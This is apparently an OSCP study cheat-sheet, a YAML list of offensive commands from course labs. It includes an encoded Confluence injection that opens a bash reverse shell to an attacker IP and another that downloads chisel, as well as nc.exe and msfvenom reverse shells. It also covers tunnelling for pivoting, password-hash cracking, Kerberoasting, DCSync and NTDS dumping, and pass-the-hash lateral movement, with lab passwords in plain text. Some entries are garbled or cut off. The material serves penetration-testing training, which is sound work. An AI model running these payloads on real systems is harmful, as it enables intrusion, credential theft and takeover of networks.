- cmd: curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.118.4/4444%200%3E%261%27%29.start%28%29%22%29%7D/
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Executing the modified reverse shell payload.
|
||
- cmd: id
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Bash reverse shell caught by our Netcat listener, and confirmed with the id command.
|
||
- cmd: ip addr
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Enumerating network interfaces on CONFLUENCE01.
|
||
- cmd: ip route
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Enumerating routes on CONFLUENCE01.
|
||
- cmd: cat /var/atlassian/application-data/confluence/confluence.cfg.xml
|
||
lang: sh
|
||
tags: oscp
|
||
desc: The credentials found in the Confluence confluence.cfg.xml file on CONFLUENCE01.
|
||
- cmd: socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Running the Socat port forward command.
|
||
- cmd: psql -h 192.168.50.63 -p 2345 -U postgres ; \l
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Connecting to the PGDATABASE01 PostgreSQL service and listing databases using psql, through our port forward.
|
||
- cmd: \c confluence ; select * from cwd_user;
|
||
lang: sh
|
||
tags: oscp
|
||
desc: The contents of the cwd_user table in the confluence database.
|
||
- cmd: hashcat -m 12001 hashes.txt /usr/share/wordlists/fasttrack.txt
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Hashcat having cracked the database_admin, hr_admin and rdp_admin account hashes.
|
||
- cmd: ssh database_admin@192.168.50.63 -p2222 ; yes
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Connecting to SSH server on PGDATABASE01, through the port forward on CONFLUENCE01.
|
||
- cmd: python3 -c 'import pty; pty.spawn("/bin/bash")' ; ssh database_admin@10.4.50.215
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Giving our reverse shell TTY functionality with Python3's pty, and logging into PGDATABASE01 as database_admin.
|
||
- cmd: for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; done
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using a bash loop with Netcat to sweep for port 445 in the newlyfound subnet.
|
||
- cmd: ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Running the local port forward command.
|
||
- cmd: proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.50.217
|
||
lang: sh
|
||
tags: oscp
|
||
desc: The NmapoverProxychains command output.
|
||
- cmd: python3 -c 'import pty; pty.spawn("/bin/bash")' ; ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4 ; yes
|
||
lang: sh
|
||
tags: oscp
|
||
desc: The SSH remote port forward being set up, connecting to the Kali machine.
|
||
- cmd: psql -h 127.0.0.1 -p 2345 -U postgres ; \l
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Listing databases on the PGDATABASE01, using psql through the SSH remote port forward.
|
||
- cmd: python3 -c 'import pty; pty.spawn("/bin/bash")' ; ssh -N -R 9998 kali@192.168.118.4 ; yes
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Making the SSH connection with the remote dynamic port forwarding option.
|
||
- cmd: sshuttle -r database_admin@192.168.50.63:2222 10.4.50.0/24 172.16.50.0/24
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Running sshuttle from our Kali machine, pointing to the forward port on CONFLUENCE01.
|
||
- cmd: xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:192.168.50.64 ; y
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Connecting to the RDP server on MULTISERVER03 using xfreerdp.
|
||
- cmd: where ssh
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Finding ssh.exe on MULTISERVER03.
|
||
- cmd: ssh.exe -V
|
||
lang: sh
|
||
tags: oscp
|
||
desc: The version of OpenSSH client that is bundled with Windows is higher than 7.6.
|
||
- cmd: ssh -N -R 9998 kali@192.168.118.4 ; yes
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Connecting back to our Kali machine to open the remote dynamic port forward.
|
||
- cmd: tail /etc/proxychains4.conf
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Proxychains configuration file
|
||
- cmd: proxychains psql -h 10.4.50.215 -U postgres ; \l
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Connecting to the PostgreSQL server with psql and Proxychains.
|
||
- cmd: sudo systemctl start apache2
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Starting Apache2.
|
||
- cmd: find / -name nc.exe 2>/dev/null ; sudo cp /usr/share/windows-resources/binaries/nc.exe /var/www/html/
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Copying nc.exe to the Apache2 webroot.
|
||
- cmd: C:\Windows\Temp\nc.exe -e cmd.exe 192.168.118.4 4446
|
||
lang: sh
|
||
tags: oscp
|
||
desc: The nc.exe reverse shell payload we execute in the web shell.
|
||
- cmd: find / -name plink.exe 2>/dev/null ; sudo cp /usr/share/windows-resources/binaries/plink.exe /var/www/html/
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Copying plink.exe to our Apache2 webroot.
|
||
- cmd: C:\Windows\Temp\plink.exe -ssh -l kali -pw <YOUR PASSWORD HERE> -R 127.0.0.1:9833:127.0.0.1:3389 192.168.118.4
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Making an SSH connection to the Kali machine.
|
||
- cmd: xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:127.0.0.1:9833 ; y
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Connecting to the RDP server with xfreerdp, through the Plink port forward.
|
||
- cmd: xfreerdp /u:rdp_admin /p:P@ssw0rd! /v:192.168.50.64
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Connecting to the RDP server with xfreerdp.
|
||
- cmd: netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.64 connectport=22 connectaddress=10.4.50.215
|
||
lang: sh
|
||
tags: oscp
|
||
desc: The portproxy command being run.
|
||
- cmd: netstat -anp TCP | find "2222"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: netstat showing that TCP/2222 is listening on the external interface.
|
||
- cmd: netsh interface portproxy show all
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Listing all the portproxy port forwarders set up with Netsh.
|
||
- cmd: netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.50.64 localport=2222 action=allow
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Poking a hole in the Windows Firewall with Netsh.
|
||
- cmd: ssh database_admin@192.168.50.64 -p2222
|
||
lang: sh
|
||
tags: oscp
|
||
desc: SSHing into PGDATABASE01 through the Netsh port forward.
|
||
- cmd: netsh advfirewall firewall delete rule name="port_forward_ssh_2222"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Deleting the firewall rule with Netsh.
|
||
- cmd: netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.64
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Deleting the port forwarding rule with Netsh.
|
||
- cmd: sudo cp $(which chisel) /var/www/html/
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Copying the Chisel binary to the Apache2 server folder.
|
||
- cmd: tail -f /var/log/apache2/access.log
|
||
lang: sh
|
||
tags: oscp
|
||
desc: The request for the Chisel binary hitting our Apache2 server.
|
||
- cmd: chisel server --port 8080 --reverse
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Starting the Chisel server on port 8080.
|
||
- cmd: sudo tcpdump -nvvvXi tun0 tcp port 8080
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Starting tcpdump to listen on TCP/8080 through the tun0 interface.
|
||
- cmd: chisel -h
|
||
lang: sh
|
||
tags: oscp
|
||
desc: The version of Chisel reported as part of the h output, along with the version of Go used to compile it.
|
||
- cmd: curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27wget%20192.168.118.4/chisel%20-O%20/tmp/chisel%20%26%26%20chmod%20%2Bx%20/tmp/chisel%27%29.start%28%29%22%29%7D/
|
||
lang: sh
|
||
tags: oscp
|
||
desc: The Wget payload executed within our cURL Confluence injection command, again.
|
||
- cmd: ss -ntplu
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using ss to check if our SOCKS port has been opened by the Kali Chisel server.
|
||
- cmd: sudo apt install ncat
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Installing Ncat with apt.
|
||
- cmd: ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' database_admin@10.4.50.215
|
||
lang: sh
|
||
tags: oscp
|
||
desc: A successful SSH connection through our Chisel HTTP tunnel.
|
||
- cmd: cd dns_tunneling ; cat dnsmasq.conf
|
||
lang: sh
|
||
tags: oscp
|
||
desc: The basic configuration for our Dnsmasq server.
|
||
- cmd: sudo dnsmasq -C dnsmasq.conf -d
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Starting Dnsmasq with the basic configuration.
|
||
- cmd: resolvectl status
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Checking the configured DNS server on PGDATABASE01.
|
||
- cmd: nslookup exfiltrated-data.feline.corp
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using nslookup to make a DNS request for exfiltrateddata.feline.corp
|
||
- cmd: cat dnsmasq_txt.conf ; sudo dnsmasq -C dnsmasq_txt.conf -d
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Checking the TXT configuration file then starting Dnsmasq with it.
|
||
- cmd: nslookup -type=txt www.feline.corp
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: The TXT record response from www.feline.corp.
|
||
- cmd: sudo tcpdump -i ens192 udp port 53
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Starting tcpdump to listen for packets on UDP port 53.
|
||
- cmd: dnscat2-server feline.corp
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Starting the dnscat2 server.
|
||
- cmd: ./dnscat feline.corp
|
||
lang: sh
|
||
tags: oscp
|
||
desc: The dnscat2 client running on PGDATABASE01.
|
||
- cmd: sudo msfdb init
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Creating and initializing the Metasploit database
|
||
- cmd: sudo systemctl enable postgresql
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Enabling the postgresql database service at boot time
|
||
- cmd: sudo msfconsole
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Starting the Metasploit Framework
|
||
- cmd: msfvenom -l payloads --platform windows --arch x64
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Creating a Windows executable with a
|
||
- cmd: msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o nonstaged.exe
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Creating a Windows executable with a
|
||
- cmd: iwr -uri http://192.168.119.2/nonstaged.exe -Outfile nonstaged.exe
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Download nonstaged payload binary and execute it
|
||
- cmd: msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o staged.exe
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Creating a Windows executable with a
|
||
- cmd: sudo proxychains xfreerdp /v:172.16.5.200 /u:luiza
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Gaining remote desktop access inside
|
||
- cmd: sudo msfconsole -r listener.rc
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Executing the resource script
|
||
- cmd: iwr -uri http://192.168.119.4/met.exe -Outfile met.exe
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Executing the Windows executable containing the Meterpreter payload
|
||
- cmd: ls -l /usr/share/metasploit-framework/scripts/resource
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Listing all resource scripts provided by Metasploit
|
||
- cmd: xfreerdp /u:stephanie /d:corp.com /v:192.168.50.75
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Connecting to the Windows 11 client using "xfreerdp"
|
||
- cmd: net user /domain
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Running "net user" to display users in the domain
|
||
- cmd: net user jeffadmin /domain
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Running "net user" against a specific user
|
||
- cmd: net group /domain
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Running "net group" to display groups in the domain
|
||
- cmd: net group "Sales Department" /domain
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Running "net group" to display members in specific group
|
||
- cmd: C:\> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Domain class from System.DirectoryServices.ActiveDirectory namespace
|
||
- cmd: powershell -ep bypass ; .\enumeration.ps1
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Output displaying information stored in our first variable
|
||
- cmd: .\enumeration.ps1
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Printing the $PDC variable
|
||
- cmd: ([adsi]'').distinguishedName
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Using ADSI to obtain the DN for the domain
|
||
- cmd: Import-Module .\function.ps1
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Importing our function to memory
|
||
- cmd: LDAPSearch -LDAPQuery "(samAccountType=805306368)"
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Performing a user search using the new function
|
||
- cmd: LDAPSearch -LDAPQuery "(objectclass=group)"
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Searching all possible groups in AD
|
||
- cmd: $sales = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Sales Department))"
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Adding the search to our variable called $sales
|
||
- cmd: $sales.properties.member
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Printing the member attribute on the Sales Department group object
|
||
- cmd: $group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Development Department*))" ; $group.properties.member
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Printing the member attribute on the Development Department group object
|
||
- cmd: $group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Management Department*))" ; $group.properties.member
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Printing the member attribute on the Management Department group object
|
||
- cmd: Import-Module .\PowerView.ps1
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Importing PowerView to memory
|
||
- cmd: Get-NetDomain
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Obtaining domain information
|
||
- cmd: Get-NetUser
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Querying users in the domain
|
||
- cmd: Get-NetUser | select cn
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Querying users using select statement
|
||
- cmd: Get-NetUser | select cn,pwdlastset,lastlogon
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Querying users displaying pwdlastset and lastlogon
|
||
- cmd: Get-NetGroup | select cn
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Querying groups in the domain using PowerView
|
||
- cmd: Get-NetGroup "Sales Department" | select member
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Enumerating the "Sales Department" group
|
||
- cmd: Get-NetComputer
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Partial domain computer overview
|
||
- cmd: Get-NetComputer | select operatingsystem,dnshostname
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Displaying OS and hostname
|
||
- cmd: Find-LocalAdminAccess
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Scanning domain to find local administrative privileges for our user
|
||
- cmd: Get-NetSession -ComputerName files04 ; Get-NetSession -ComputerName web04
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Checking logged on users with GetNetSession
|
||
- cmd: Get-NetSession -ComputerName files04 -Verbose ; Get-NetSession -ComputerName web04 -Verbose
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Adding verbosity to our GetNetSession command
|
||
- cmd: Get-NetSession -ComputerName client74
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Running GetNetSession on CLIENT74
|
||
- cmd: Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Displaying permissions on the DefaultSecurity registry hive
|
||
- cmd: Get-NetComputer | select dnshostname,operatingsystem,operatingsystemversion
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Querying operating system and version
|
||
- cmd: .\PsLoggedon.exe \\files04
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Using PsLoggedOn to see user logons at Files04
|
||
- cmd: .\PsLoggedon.exe \\web04
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Using PsLoggedOn to see user logons at Web04
|
||
- cmd: .\PsLoggedon.exe \\client74
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Using PsLoggedOn to see user logons at CLIENT74
|
||
- cmd: setspn -L iis_service
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Listing SPN linked to a certain user account
|
||
- cmd: Get-NetUser -SPN | select samaccountname,serviceprincipalname
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Listing the SPN accounts in the domain
|
||
- cmd: nslookup.exe web04.corp.com
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Resolving the web04.corp.com name
|
||
- cmd: Get-ObjectAcl -Identity stephanie
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Running GetObjectAcl specifying our user
|
||
- cmd: Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Converting the ObjectISD into name
|
||
- cmd: Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-553
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Converting the SecurityIdentifier into name
|
||
- cmd: Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Enumerating ACLs for the Management Group
|
||
- cmd: net group "Management Department" stephanie /add /domain
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Using "net.exe" to add ourselves to domain group
|
||
- cmd: net group "Management Department" stephanie /del /domain
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Using "net.exe" to remove ourselves from domain group
|
||
- cmd: Find-DomainShare
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Domain Share Query
|
||
- cmd: ls \\dc1.corp.com\sysvol\corp.com\
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Listing contents of the SYSVOL share
|
||
- cmd: ls \\dc1.corp.com\sysvol\corp.com\Policies\
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Listing contents of the "SYSVOL\policies share"
|
||
- cmd: cat \\dc1.corp.com\sysvol\corp.com\Policies\oldpolicy\old-policy-backup.xml
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Checking contents of oldpolicybackup.xml file
|
||
- cmd: gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Using gppdecrypt to decrypt the password
|
||
- cmd: ls \\FILES04\docps1are
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Listing the contents of docsare
|
||
- cmd: ls \\FILES04\docps1are\docs\do-not-ps1are
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Listing the contents of donotps1are
|
||
- cmd: cat \\FILES04\docps1are\docs\do-not-ps1are\start-email.txt
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Checking the "startemail.txt" file
|
||
- cmd: Import-Module .\Sharphound.ps1
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Importing the SharpHound script to memory
|
||
- cmd: Get-Help Invoke-BloodHound
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Checking the SharpHound options
|
||
- cmd: Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\stephanie\Desktop\ -OutputPrefix "corp audit"
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Running SharpHound to collect domain data
|
||
- cmd: ls C:\Users\stephanie\Desktop\
|
||
lang: sh
|
||
tags: oscp
|
||
desc: SharpHound generated files
|
||
- cmd: sudo neo4j start
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Starting the Neo4j service in Kali Linux
|
||
- cmd: bloodhound
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Starting BloodHound in Kali Linux
|
||
- cmd: xfreerdp /cert-ignore /u:jeff /d:corp.com /p:HenchmanPutridBonbon11 /v:192.168.50.75
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Connecting to CLIENT75 via RDP
|
||
- cmd: dir \\web04.corp.com\backup
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Displaying contents of a SMB share
|
||
- cmd: impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Using GetNPUsers to perform ASREP roasting
|
||
- cmd: kerbrute userenum --dc 192.168.56.30 -d mini.lab /usr/share/seclists/Usernames/xato-net-10-million-usernames-dup.txt
|
||
lang: sh
|
||
tags: oscp
|
||
desc: enumerate users of AD using bruteforce userlist
|
||
- cmd: kerbrute passwordspray --dc 192.168.56.30 -d mini.lab users.txt phantom
|
||
lang: sh
|
||
tags: oscp
|
||
desc: perform a horizontal brute force attack against a list of domain users
|
||
- cmd: kerbrute bruteuser --dc 192.168.56.30 -d mini.lab /usr/share/seclists/Passwords/500-worst-passwords.txt ben
|
||
lang: sh
|
||
tags: oscp
|
||
desc: traditional bruteforce account against a username. Only run this if you are sure there is no lockout policy.
|
||
- cmd: cat combos.lst | kerbrute --dc 192.168.56.30 -d mini.lab bruteforce -
|
||
lang: sh
|
||
tags: oscp
|
||
desc: bruteforce with reads username and password combinations (in the format username:password)
|
||
- cmd: hashcat --help | grep -i "Kerberos"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Obtaining the correct mode for Hashcat
|
||
- cmd: sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Cracking the ASREP hash with Hashcat
|
||
- cmd: cd C:\Tools ; .\Rubeus.exe asreproast /nowrap
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Using Rubeus to obtain the ASREP hash of _dave_
|
||
- cmd: sudo hashcat -m 18200 hashes.asreproast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Cracking the modified ASREP hash
|
||
- cmd: .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Utilizing Rubeus to perform a Kerberoast attack
|
||
- cmd: cat hashes.kerberoast ; hashcat --help | grep -i "Kerberos"
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Reviewing the correct Hashcat mode
|
||
- cmd: sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Cracking the TGSREP hash
|
||
- cmd: sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using impacketGetUserSPNs to perform Kerberoasting on Linux
|
||
- cmd: sudo hashcat -m 13100 hashes.kerberoast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Cracking the TGSREP hash
|
||
- cmd: whoami /user
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Obtaining the domain SID
|
||
- cmd: klist
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Inspecting the injected ticket in memory or listing Kerberos tickets to confirm the silver ticket is submitted to the current session
|
||
- cmd: iwr -UseDefaultCredentials http://web04
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Accessing the SMB share with the silver ticket
|
||
- cmd: impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@192.168.50.70
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using secretsdump to perform the dcsync attack to obtain the NTLM hash of _dave_
|
||
- cmd: impacket-secretsdump mini.lab/bob:"superman"@192.168.56.31
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using secretsdump to get the secrets of the owned machine
|
||
- cmd: wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc"
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Running the wmic utility to spawn a process on a remote system.
|
||
- cmd: $username = 'jen'; ; Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Executing the WMI PowerShell payload.
|
||
- cmd: python3 encode.py
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Running the base64 encoder Python script
|
||
- cmd: $username = 'jen'; ; $password = 'Nexus123!'; ; $secureString = ConvertTo-SecureString $password -AsPlaintext -Force; ; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString; ; $Options = New-CimSessionOption -Protocol DCOM ; $Session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options ; Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Executing the WMI payload with base64 reverse shell
|
||
- cmd: winrs -r:files04 -u:jen -p:Nexus123! "cmd /c hostname & whoami"
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Executing commands remotely via WinRS
|
||
- cmd: $username = 'jen'; ; $password = 'Nexus123!'; ; $secureString = ConvertTo-SecureString $password -AsPlaintext -Force; ; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString; ; New-PSSession -ComputerName 192.168.50.73 -Credential $credential
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Establishing a PowerShell Remote Session via WinRM
|
||
- cmd: Enter-PSSession 1
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Inspecting the PowerShell Remoting session
|
||
- cmd: ./PsExec64.exe -i \\FILES04 -u corp\jen -p Nexus123! cmd
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Obtaining an Interactive Shell on the Target System with PsExec
|
||
- cmd: /usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.50.73
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Passing the hash using Impacket wmiexec
|
||
- cmd: net use \\files04 ; klist
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Mapping a network share on a remote server and listing Kerberos tickets
|
||
- cmd: cd C:\tools\SysinternalsSuite\ ; .\PsExec.exe \\files04 cmd
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Opening remote connection using Kerberos
|
||
- cmd: whoami ; ls \\web04\backup
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Verifying that the user jen has no access to the shared folder
|
||
desc: Injecting the selected TGS into process memory.
|
||
- cmd: ls \\web04\backup
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Accessing the shared folder through the injected ticket
|
||
- cmd: tasklist | findstr "calc"
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Veriyfing that calculator is running on FILES04
|
||
- cmd: PsExec64.exe \\DC1 cmd.exe
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Failed attempt to perform lateral movement
|
||
- cmd: PsExec.exe \\dc1 cmd.exe
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Performing lateral movement and
|
||
- cmd: psexec.exe \\192.168.50.70 cmd.exe
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Use of NTLM authentication blocks our
|
||
- cmd: vshadow.exe -nw -p C:\
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Permorming a Shadow Copy of the entire C:\ drive
|
||
- cmd: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Copying the ntds database to the C:\ drive
|
||
- cmd: reg.exe save hklm\system c:\system.bak
|
||
lang: ps1
|
||
tags: oscp
|
||
desc: Copying the ntds database to the C:\ drive
|
||
- cmd: impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Copying the ntds database to the C:\ drive
|
||
- cmd: mkdir beyond ; cd beyond ; mkdir mailsrv1 ; mkdir websrv1 ; touch creds.txt
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Basic work environment for this penetration test
|
||
- cmd: gobuster dir -u http://192.168.50.242 -w /usr/share/wordlists/dirb/common.txt -o mailsrv1/gobuster -x txt,pdf,config
|
||
lang: sh
|
||
tags: oscp
|
||
desc: Using gobuster to identify pages and files on MAILSRV1
|
||
- cmd: whatweb http://192.168.50.244
|
||
lang: sh
|
||
tags: oscp
|
||
desc: WhatWeb scan of WEBSRV1
|
||
- cmd: wpscan --url http://192.168.50.244 --enumerate p --plugins-detection aggressive -o websrv1/wpscan
|
||
lang: sh
|
||
tags: oscp
|
||
